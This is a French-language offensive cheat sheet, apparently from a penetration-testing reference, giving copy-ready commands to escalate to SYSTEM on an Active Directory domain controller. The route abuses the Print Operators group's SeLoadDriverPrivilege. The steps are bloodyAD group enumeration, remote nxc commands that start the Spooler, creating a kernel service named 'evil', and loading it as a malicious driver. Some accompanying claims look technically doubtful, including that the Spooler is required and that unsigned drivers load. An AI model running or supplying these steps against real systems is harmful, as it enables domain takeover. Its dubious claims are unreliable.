Exploitation

Print & Server Operators

Abus de SeLoadDriverPrivilege via Print Operators pour obtenir SYSTEM sur le DC.

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get members 'Print Operators'

Description: Lister les membres du groupe Print Operators : peut charger des drivers kernel en tant que SYSTEM.

Copy command
nxc smb $DC -u $USER -p $PASS -x 'sc config Spooler start= auto && sc start Spooler'

Description: S'assurer que le service Spooler est actif : requis pour charger un driver.

Copy command
nxc smb $DC -u $USER -p $PASS -x 'sc create evil binPath= "C:\Temp\evil.exe" type= kernel'

Description: Créer un service kernel malveillant : Print Operators peut charger des drivers non signés.

Copy command
nxc smb $DC -u $USER -p $PASS -x 'EnableSeLoadDriverPrivilege.exe && sc start evil'

Description: Activer SeLoadDriverPrivilege puis démarrer le driver malveillant : SYSTEM obtenu.